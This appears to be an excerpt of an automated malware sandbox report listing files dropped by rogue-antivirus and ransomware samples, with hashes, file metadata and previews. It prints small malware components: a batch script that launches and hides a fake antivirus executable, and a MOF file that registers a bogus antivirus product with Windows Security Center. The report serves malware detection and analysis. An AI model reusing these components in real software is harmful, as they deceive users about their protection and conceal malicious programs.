                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..
                                                                                                                                                            Process:C:\Windows\302746537.exe
                                                                                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):348
                                                                                                                                                            Entropy (8bit):4.746239451096403
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:hWcyRlRoLUX/CQrRjzHJ//1zBDRv7YUK1R7Y77hG7Y7nrn:wn7VFXfrv+7Q7gQr
                                                                                                                                                            MD5:7D8BEB22DFCFACBBC2609F88A41C1458
                                                                                                                                                            SHA1:52EC2B10489736B963D39A9F84B66BAFBF15685F
                                                                                                                                                            SHA-256:4AA9ED4B38514F117E6E4F326CB0A1BE7F7B96199E21305E2BD6DCE289D7BAA2
                                                                                                                                                            SHA-512:A26CF9168CF7450435A9FE8942445511F6FDA1087DB52BD73E335D6F5B544FC892999019D9291D9DCC60C3656DE49688F6D63282C97706E2DB286F988E44FD94
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:@echo off..title LOAD..:1..if not exist c:\windows\comctl32.ocx goto 1..regsvr32 /s c:\windows\comctl32.ocx..:2..if not exist c:\windows\mscomctl.ocx goto 2..regsvr32 /s c:\windows\mscomctl.ocx..:3..if not exist c:\windows\antivirus-platinum.exe goto 3..start c:\windows\antivirus-platinum.exe..attrib +h c:\windows\antivirus-platinum.exe..exit....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                            File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):443
                                                                                                                                                            Entropy (8bit):5.130314528868292
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:jNpKiB8l5hNffFGWIylPZg4GKV7F0NbW7GitW74Id4YbJ:PB8vhFfk0lPS4GK9F6b/UcW2J
                                                                                                                                                            MD5:7FAD92AFDA308DCA8ACFC6FF45C80C24
                                                                                                                                                            SHA1:A7FA35E7F90F772FC943C2E940737A48B654C295
                                                                                                                                                            SHA-256:76E19416EB826A27BDCF626C3877CF7812BBE9B62CC2CCC5C2F65461D644246F
                                                                                                                                                            SHA-512:49EED1E1197401CB856064BF7FDBD9F3BC57F3C864D47F509346D44EED3B54757D8C6CDB6254990D21291065F0762D2A1588D09E43C5728F77A420F6A8DCD6EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:// Load the MOF in Root\SecurityCenter namespace..#pragma namespace("\\\\.\\Root\\SecurityCenter")..// Create the class..// No properties are specified..// so the class will have only system properties..instance of AntiVirusProduct..{.. instanceGuid = "{28e00e3b-806e-4533-925c-f4c3d79514b9}";.. companyName = "Antivirus";.. displayName = "Antivirus";.. onAccessScanningEnabled = true;.. productUptoDate = false;.. versionNumber = "1.0";..};..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                            File Type:Clarion Developer (v2 and above) memo data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):344
                                                                                                                                                            Entropy (8bit):5.912949267405057
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:nJZyGBTJ+lC2+pbAouIt92+TmWT/2awlakM4N7pcQi8whabkEWwaR3P8tW:J0GBTEn+TuIt9vTmWT2aYu4N7pZLbQvR
                                                                                                                                                            MD5:229DA9FD2C16BFBD03970ED6F6B441B4
                                                                                                                                                            SHA1:7A6C45162B1D7532C2BC8604108670DC4546F3E9
                                                                                                                                                            SHA-256:4E04734E785D38476F15F46025EDAD0918E2BA452DC982C7C54C674E3DC32169
                                                                                                                                                            SHA-512:C431D7E0B485C490965625D8F17D3D3D198DD7FBDEF71E9359DBA6D7210B9E8D215C9C4195305701F0E1899687D163753489796245BA479C16251F957614A688
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:M36jVndwGjvDAqS4pysLKl1Kx68dvoeQ9ZLweV/JhXlTvo0Srwa3aAvZb4MxOPu7X2xXEiQ6pvelQCs7bVxNhhI0i2cQ4JBa2tU2oSssX5sOi+mBNRQ/w9NBf7Ejv4wRFuFXIr+uMIbS8nnmBRNIQSFMG0li2qlR2y3rnYOxNVaaGyvfkYsZHAjDIP68Z+hW/SrDgYjlSl0/yVo4artgZq4yvvIWW5KKZFdyTYPAahpVVUtWcQpApgHGSao+3nSuJ/1cGQYzOCjRlzEN5Vi1ouTR7Xy9s1os72vBHQfjOzBfbkzaVOdG6gHtWqxD4ycz5HzlXBuvyD2NqY5buZTJRA==
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                            File Type:b.out segmented standalone object file V2.3 V3.0 286
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130
                                                                                                                                                            Entropy (8bit):6.339836613388452
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Tlp32CylAjFpNLz3HA/ag35/5Iytc/U/QBfvlFS:mCf3g/tjtc/2Qly
                                                                                                                                                            MD5:F003E5A780C52CF7121796527663C354
                                                                                                                                                            SHA1:E707AC651E9251B7E963546774DCCCF8B3F89C8A
                                                                                                                                                            SHA-256:EE9D4F8C051856682ED6972E437CA632E00BF8A9F1174C159A594DD85C06FF2B
                                                                                                                                                            SHA-512:C455B06095B0AF5ACE1D6959A23159D3A1B3C64D9A95F0AEA9E39EC3CD1D65D47C03406748FE863C5CE72896D480479E82779692FCF9C4F924C5AAC90857B406
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:........RSA1p........I.O..J.........0.E.|]..u.E...(9..$...V.T>d.l.SB...hWR[c$..5Z7/-p/.H.N5.^..R1.~.qC|..S[...c......W.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):333007
                                                                                                                                                            Entropy (8bit):7.760234463267217
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Tuw0sRI520bSuw0sRI520bwRw0sRI520bzow0sRI520bwuwisRI520bwuw0sRI5A:yoRQFxoRQFQoRQF8oRQFX6RQFXoRQF+
                                                                                                                                                            MD5:A1455B4FD0931860BCB32FD11246F976
                                                                                                                                                            SHA1:6D7D1EE0D5E8F434A0A4AE4AD30A27D3AEBD4E75
                                                                                                                                                            SHA-256:D15E5D7009476AB29183F4C81B115F0C1DA3DE0B1FA7D2BEE17A3058070E718A
                                                                                                                                                            SHA-512:31929AB212E076856A0AAD539D5FA08B341BE73E1829A4A9CDB87A5FFFF7D329C8953DBB3A2129A8E0D9664E992DFEED8CD12215374B58C4D0F3CD6255F974FD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:......................>.......................................................}.......v.......~...................................................................................................................................................................................................................................................................................................................................................................................................................................E...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):576
                                                                                                                                                            Entropy (8bit):7.627951794431309
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:bk4KLKHbGck6aWdq+GTYJdF6G74vOPkQmle0mWAMMK:bk1mHqx6/drGTYnFf6O81g0mWAxK
                                                                                                                                                            MD5:9FD12F403E6109424409D1C3006B44DA
                                                                                                                                                            SHA1:FB4F0846106C35CB0610C7E147907E89AFEDC271
                                                                                                                                                            SHA-256:7523499695A96F121F33B06238EBCD6FEAB82A2A5056C517B5BB69ACE87C1EDA
                                                                                                                                                            SHA-512:720A71B551DC65E3E42E59F303FE444DC912F5EEB669CC19F95A8339E71031BC524BCC590694AA2F87A5A7952EF157FF26A0418CF2E8D001B021350A4BB7610A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z".....[`......Y..9q..\X.....J.n....a.@...!...(z..Cf.+1.....Q...n....#O....X.P..5.C..&@j..9.....B(..w.......'.*%.'s O@.G9.[".w|.k..7.....veK.jTB..z..[..n.N.+..X...ol....t...P......1v2.....@...i...s/%....m...;..x.D...8.Z.]....]..&.b.L......H..2...=8......5.N.KnQ.'..&.t...w,.P......=`....O...7(...!B..H...e..Eb.fW....y.....=P.0......*:.1.{5...4..U..P...H.6XF........+....8f..L.....1d.[..9n.....@N$Pg(.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):464
                                                                                                                                                            Entropy (8bit):7.554821325200221
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:7wCMSmLsDdTcLKHuKtErurhRSnh3nGloMo6PGKubsI+CuLnHmJKbwNFxZOZk0x:bk4KLKHu+25hWSKuYNLnHmJPFb/0x
                                                                                                                                                            MD5:35627B58B59FD3F596009F061A028E41
                                                                                                                                                            SHA1:ADBD158CB56546093B99F5864C865E2F21E850D9
                                                                                                                                                            SHA-256:5BFCBCD13A685840C9021D44E455A834A00C40E5F999011C2349890690C88461
                                                                                                                                                            SHA-512:1D7C415158BB0B93FC7959F4A1B77DC9C3750862462476A52929E1F87706B4C08CA92BD21199BFD0EF4C7B656A21B49ABF6FDFDE9ED8AE7D5005BEF26C51DAD8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z"..:_...m.^..A.......R......}#.%@..p.K6.//..3_..(`..`._".qnUS".)|..g.#......F.k.....~7.v.#$..^.....:zp...`...".a...Q...X.`J.O.......U..s".M..|^m.....m..U@.f$.4sD&./...oHv...R%...Z.Wq.=..#1y.."..Q.N1......1.A.....hHm....n.....4).n.v.6...,.;Q....^1.`B|*-G^...........O..Bw..<).......P.....A
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):176
                                                                                                                                                            Entropy (8bit):6.976365993588136
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:vC7Y3Vw3yhggaHt20F14AGrdIIrSOcdHMP7saTv5VuVLGJVTHUkxm:7wCMSmLsDdTcLKHW
                                                                                                                                                            MD5:197607D7A6EBCA76120E06E6EA9CE3D1
                                                                                                                                                            SHA1:C27BA0BF2D608554364EE535A729C7348ADD8016
                                                                                                                                                            SHA-256:7616342DE7F607ECFC43AEA9B2A37489DCAE54DBB8E24901E44EE50576896CD7
                                                                                                                                                            SHA-512:B16276A401732BEF17CB31E1C3BB844B675F33E316F18FEE57DBED4EB0BBB28F25F5B29416C09708ADB4755778D1D90AD14644F64BAC409131DFA6E0F7A988B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z"...+.E....2a..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):800
                                                                                                                                                            Entropy (8bit):7.73732445631099
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:bk1mH25/Da4rm1dsQqG4S8v5+u/K9FSMV6:bk1w6+MI4RxK266
                                                                                                                                                            MD5:CB1710BFF9638AFF418668F43AB04259
                                                                                                                                                            SHA1:044C78C837B9DF906665331143CCF1158CC9493F
                                                                                                                                                            SHA-256:064054F3CC5A09BCA79043A272C76A254ACFE4FB02BDCD9F17E9083B8EB54F0D
                                                                                                                                                            SHA-512:E4C8B2474DCF748F679A0036A727E7AAFB54F02533916D8AABFE4F092E1E5F676E694789B9C57B6599015E00C5A558020CA701DB91001641218362684E3146CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....g^.&^.....3:'0....f F...|,Y.$[....W....t..<.a.AL.9A.......{...B.G...b5.../i...`r{.4E...n.Lm...U.....7...s...._......J..v.R}.`.K|.nc....0.Fgq.H#.z"..?.&.._2.'..L.D...W..F..[n.5.....qVB*....x.!%......z...?..m.<...zM.........J,....Hlu...'%R......`.+];.I.|.....YA..Y.#..f....D.....v.Ij.v....'.A.. 1.?.w.|!....f........:..oSpw...{.M....t;*......'M..G)...................|q...@pY.~.!..dP.q....B}._.L..pb..)R?".F.YN...e2..F.Xy.sG....8.4...CT.....8.0].....A!.;+....9...Y.M"5.D-.h..OF..}....:qA.zG.....w...]].#.9......6......4l..R........B..},... PXXe.-39g..W.|...s....<...<.b......6p2....].I..c....F.j.=...}.pP...AV.F.3...kM~.K.D..1......o..f.>..Q`....;.....x.Z.0....N....!.rv..w...,...l.'..`Tu.QYy*.MkY<...."m!..].X..A1...7jc..:...0.....t.D........).T'.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.822220848877692
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SBSAWRgIEGRrZg4TeLcnsFqNhTh5ythfhsy/JwcfruS2:SVWRyKuZesMvehf9/ld2
                                                                                                                                                            MD5:260AFFA1D703455800FA215F85EA466A
                                                                                                                                                            SHA1:B7D33C6EE4B3C7F03F1E43263172E2C2DC338691
                                                                                                                                                            SHA-256:2429333A7B5257419799C826C68D5D3CB9E6A933792B5249DBF737F71650B71D
                                                                                                                                                            SHA-512:1B1C339CD8E33BC62EC8302433FEAEB757863F7EF751A8F74DE573B074711BC547801056CE641C02164AB445DD585B8ED9D1F7AE453A789CBB4A19826DF79F9D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:\.>.8.)..E..v].E...H.H/.:..cQ(e.@|#...J...x.,+K..S..:..-.sfm.Y.x...R:.....D%.R..6-.mO...V..V..!..a.q./...5(F"..VYqHc..oU..)W^.u.-&..j.$).."f.F.W.....(<........[.#g.......n5u.c.......`...Iv..F.w.y..5....,1..27......._..{XxV..F...q.6^bEX.d^.|..1...}HP.Y.pU....V.....y..........9.W$.a..5f&...c.V.d.-..R.....tBo.....=X._..Iuz.;.OzY.{.!+:.....+...Rt..%....`..0|9+d.......(......."...Y..l.P.."1g.#H.. x.w.....0.3.MF.`.g....Z...+Qad.#..)..gqP......Xk.2...u.N.....k{'....+u\...!.x.T ....a.9..>.T._....Z..(_..!I..43u...@w..$.......K5...... .V......S..)5Q..x+.6|.C.k..Y.$..d.....s....aR^...x..}.....!.g..%6...Wg.8........M..L@......<p.K..Z.i.+d..]ED...2......[2......L...6......%.q..Q9.Nn...W^.wC..!S...1.['...('.3,.-Dx.._.3.t.....r..O..a...NS..|..d..[Xx.y....$..jI.U..Np.....U.J.......{..L.c-......9.8&.;.~.....n.............|..<.j..eA.2.Z..]+.h.+ya..iX(.5..o$.3....p...S}I.....et.Q.....'.....SD~,...U..Jgr`.C1..{....fu...m..0.....3.../#Vb-..o"..ih...X.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:DOS executable (COM)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8320677353784625
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tI8nO9z4tP5p/2mENQnDBqfX1yrJi4zGcoFYQ0/I7IP:tIhMtP5p/MIQmfoaQ0kQ
                                                                                                                                                            MD5:39AF4D6C440D73D32654C7C023604B5B
                                                                                                                                                            SHA1:A0197E60E19D9B0D1B3AD2A3C1D63341D5B52E09
                                                                                                                                                            SHA-256:43B9321C34A57D6442093F0AEF7E46C453EE34E5927701DCF11A3EC8214D5861
                                                                                                                                                            SHA-512:9C410BCF2035D1645414485E591D45CABC7CC99A30A2C310AA615A52468AE7F954F4646DD88F2E02B3E71FE02684772BC531B190A4CCF8DFF3CBA8847554E505
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.jm.a.j.z&k`..U....1A[`n7G..@.?.bt3....fk.GI.Xx.l.._.....h.[/@..f.....D.....s]h...&#..x..b..c....,..N.6=:{Ca. .....`m(..N.R.*..&........0h...O..rj=....;.1.Z.e..H..w....U..+........ue.,....i.Z.(..0r..K.Ag.....@8..:f=FY..........kd..<...Wc.m/.u....).<.i..I.(..4....vH....@..`(.......s.....R..Yha...'...5$..~X....../....=..z..jnHW...=.:..%]D.tJ...."*.4Nw..r..C....B....Z..\.."..%6.*.I...df.v7._.......}v,<......P..%...y....`..;B.....2.0} .;O...3....%.}e.wI..}..`U&..'.;..s..(..o.E.3..l..[.q.V..ir...5..z"<F.VP.V4.....2..9<....+.4.".6.x{.Kq.W'....n..WH.9.uC....]4=...B+.-z...B|...j..... .X.0.....\N%.W. ....Q.nSh..S...w.\.$..8.gKg.>..^.fr.}!...7#rO\T...w.7.i...;b.."..r.3...yq.`V5..e..V.Qv{..H..Q8.G..#...{.uXL...?.../r....4....B.t[%....!lL.g.s'../r..o.@..x.2y.umA.....n..i.C.i."......yz..Z*#.|$c.AE'....R..[...01.I..[ ..f......(..qAmG..R.i...v.......Nu..q..Z.....df..j...z.H..n.....T..Aa..x|.....X*..#.....V..B......ktw.s,...eGz.-...YF/..C.D....\.|..b.@
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1178406
                                                                                                                                                            Entropy (8bit):7.999833834152535
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:lKTP6/tHWoQQRakFbfVKqycdGiazlXVyQ8MiSIxjlTGPje9V4iuquGGspoLA:lK4WDQRaklfVKJcd7MXVlPiZlTejkV42
                                                                                                                                                            MD5:9A38C29FF9E12BA2892381EB51C79934
                                                                                                                                                            SHA1:76FCF6BCAAC32F624FA0154A9177E44469B5886A
                                                                                                                                                            SHA-256:45B75A116AA3B07F90A7C2D9A83C2CDE524797DF88BB5E20F9DC1E74D8527861
                                                                                                                                                            SHA-512:C26D8C252D6F18A2AE4419BBFE27099862A625CBC40D8F104FA20CB361DA112EBE6A17935AC3613C24B58F9C291D2219E55F59E0FA40B81F92FCCF190115E734
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c..\.<....X...Z.......Endermanch@AnViPC2009.exe......AE.........-4x5...B.....]..<..}./a..(.q\.{|0....<.{..._..:.....C:.....<R..\]..x.e.S*.AM.2.....!....T..y..u..2._p.N.....Sr..../1..o.2....&..U.D...z%..I..Rn..r.0.........m.,`.Q.......<..6..EB..v7f.,X..x..)1.-"............{...<..>....%|.C...dID...hR.OD.....w.<@..C...6....U;W$..e.....q..!.,.Y;.>.'K...C..Y.J.Q..h.~..f...3...D..C....1.PG..E..%...#-T.<.B..:X...>.SF..2x.S......z..5....1]....c...h.....]....:.WWL...RWV.;.=..?.....S..Of...'......oa..%........8AQ.y...p...X/x.2g._.V.6.fL.~......:..x...........tB.V~..0.v.....uO3..............$.Z...n.b-..P*:$......U.....U.B...O..}..L....3.n..@.......nz.q'.l...z_....e..l.6....{.....>...|%6..;..}o..p[..X.....}..Z.(..7J......l...kb...rHib......1.*...*..m..,.1.p,..FM]AaE....P.+..*M...`XhK.s87P.2Hc.....*.......PY.m.x:OO......&~#..@...}J..B.uq.\.v.fE.p....(.G\!.. X..0....I...Y..mw.Bg.\.R..K..vV.C..lT.wT...o2...Y"(M..,.}.k...@b.8.(.%..K...YT.34[o|.[.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Sep 29 20:45:39 2022, mtime=Thu Sep 29 20:45:39 2022, atime=Sat Jan 16 20:57:50 2010, length=22528, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1700
                                                                                                                                                            Entropy (8bit):3.062720943403016
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8spmIOISSrq9yAvOp+cWeKec4of2b0H7aB6m:8enG9RvO+9kofERB6
                                                                                                                                                            MD5:AF70EFB47A69B80BCE629675FBBA4153
                                                                                                                                                            SHA1:5759ED7789AD143EDA17CDA5FFEEE85C2C2D98D9
                                                                                                                                                            SHA-256:5F779D927BC0AA93EB09DF9F67E7D5D37B9B776FE10C7CE2D4BA3A95094D8FE4
                                                                                                                                                            SHA-512:F7F53BE11EDBCBB363A38892A37384F28472714D6F22336CDD85C92F80B9598504F75B52DFD03C1848A851863604E70E62B3751D9F557B56F7ADBA802656C8FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:L..................F.@.. ....O..L.......L............X...........................P.O. .:i.....+00.../C:\...................V.1......U...Windows.@......L..=U...............................W.i.n.d.o.w.s.....h.2..X..0<9. .302746~1.EXE..L......=U..=U......~]........................3.0.2.7.4.6.5.3.7...e.x.e.......G...............-.......F............C.......C:\Windows\302746537.exe....A.n.t.i.V.i.r.u.s. .P.l.a.t.i.n.u.m.......\.....\.....\.W.i.n.d.o.w.s.\.3.0.2.7.4.6.5.3.7...e.x.e...C.:.\.W.I.N.D.O.W.S...C.:.\.W.I.N.D.O.W.S.\.3.0.2.7.4.6.5.3.7...e.x.e.........%SystemRoot%\302746537.exe..........................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.3.0.2.7.4.6.5.3.7...e.x.e...........................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1712
                                                                                                                                                            Entropy (8bit):7.867829955399038
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:PEtQGIBC03M419sK8FgTJsquXt8Q7be6oe:mkBfNCbFMJsftPf
                                                                                                                                                            MD5:2D170176E3B7D61B7BA23F8618ADF7A0
                                                                                                                                                            SHA1:DB4FEEE98FD80A77CDD49963253727F5594AFA2B
                                                                                                                                                            SHA-256:27F7277396E1B2DC9EB853CC7B5D975F94AB8D18D928CC4E785E35640F594413
                                                                                                                                                            SHA-512:E81E40D9D869A5F79D0FFBCE80038159F36D564621B09C03F844A133B651438DF0E6A84577AC215BEB8FC88B07A46E046F85926A136FABC1E961F232450BF955
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.t..D..w)..@f.8z.J^=T...>.V.)h.....5.....U..8..3.w....P`.s.S.+...q... .s>Q..cm......_>s...;].].l..c<.9..md=K..'0.f.{[..........v...}.,p........2.k=...3.6...Q...]..A......B.F..jvl........PG...2...F....q.;..<P..~./..v...\......t...ow..........Y..`.,..\.o..7D....2Tq.<..>db.......+..e>*..~.....('..].....,P../.1Bs.<..8..I.C. .....I.v......=...E.w..D<.E.+.m..4.....]...A..O)..Y.fR..>~.....8....u...]/....._...cA...8....n.Ns......5..5+n%I..8....`.U...K._z....).o.J......2....s.d.....V.`.....\..........~^i.wI.k..@.0.,...Yi..T+fa..[%.d..X.K..qk.Q.+..& ..jC:~//U_u...s..c..5.h..lY...n.$.........K...Ug(.I.Q.*..1.@.e.....f....nx.I.d.7..;.(......Y..rupk..5.c."'.6.0n.......(....l....^{...'.R.`....>p.......wv.]5.OVEp..yz.9.....9.??z..4...~.......(?...+....N..]...G..0...K=N%..S9=..A.j..7Y...S.~.qE.._.d:..!...I@.....N......m.....I....9..ey:.:<f6./c.+.OvSL.e...{....<.-.C^.l./."...p%..Zb..%r.vg"N.\.W...)...bU.?..{..]..5.{.rT.Cs....Rn..GHi&..].Kp.'=.i.....!&
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):716432
                                                                                                                                                            Entropy (8bit):7.999718752172075
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:pKAT6gPoHT7CzZy7fmzVyaF3zA0mKz8doC3m/LuXCC32H+REYWzTdjhoMlX1Q4QM:2gPoHT7CtEfwyaFDAjKz8Bm/LYC+3uYi
                                                                                                                                                            MD5:FF84853A0F564152BD0B98D3FA63E695
                                                                                                                                                            SHA1:47D628D279DE8A0D47534F93FA5B046BB7F4C991
                                                                                                                                                            SHA-256:3AAA9E8EA7C213575FD3AC4EC004629B4EDE0DE06E243F6AAD3CF2403E65D3F2
                                                                                                                                                            SHA-512:9EA41FE0652832E25FE558C6D97E9F9F85CCD8A5F4D00DBCC1525A20A953FBD76EFB64D69CE0FDD53C2747159D68FCB4AC0FA340E0253B5401AEBC7FB3774FEB
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK.........P><..(........ ...Endermanch@AntivirusPlatinum.exe#.J...3.....f.........r.......G2[X...4......1|...(.....ZG4..X...I..v......Aa.54.yE....MhG..'..e`......&....TXA\........"{5....UqD.i.H........f......@y".}{.....u.....%.V/t..+.=.A1.A.C.T......O..c..2..+....2C64.....f>a...#.\b.4Z._.)....II0.....{n......6x.[.......#O#.... ....jY..*...S..q1. ..7.....`.......IA....v..K.7.'..TXI....l.....vP#.;x.'z.......geZ.z..J..R.AV....U.8`.Zy...a.i.$L....x...9..w..:..4.c........>.a.P`.A. ...8g.=A.....u..#..V.uz.7.".6.G..kv.....p.<.L0.VZpw......?.:...E.v.Vt.c.6..e.Vw[.+.......].%..RSFN....._.%.$.m.{....n....E,7...S.!.....!...;.nH..MQ..5.............zA.....h....P..M..@..[....C..hYN.pF3O=.Kb.j.V...z.i..>YE.q....V~V.g.....7.._Ucwn=]..8.!..>[&.q.98.....y......x..d.l..... '.k.Z..f......XrpMf.y.p....97./...=5../.#.<.>h@..e............K.6.\...>...~.........q{......6...'.{".U..90.oI..zO........%.-..4.kK...D...3...]S.K(.O......).....a...cutT..<.......f.v..8.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):813771
                                                                                                                                                            Entropy (8bit):7.999770789356288
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:5AKFQL3t2IUmZwXlgqEKUhHgQeX8k22QO:auQLQ6wmqESzPQO
                                                                                                                                                            MD5:AB1187F7C6AC5A5D9C45020C8B7492FE
                                                                                                                                                            SHA1:0D765ED785AC662AC13FB9428840911FB0CB3C8F
                                                                                                                                                            SHA-256:8203F1DE1FA5AB346580681F6A4C405930D66E391FC8D2DA665AC515FD9C430A
                                                                                                                                                            SHA-512:BBC6594001A2802ED654FE730211C75178B0910C2D1E657399DE75A95E9CE28A87B38611E30642BAEAE6E110825599E182D40F8E940156607A40F4BAA8AEDDF2
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
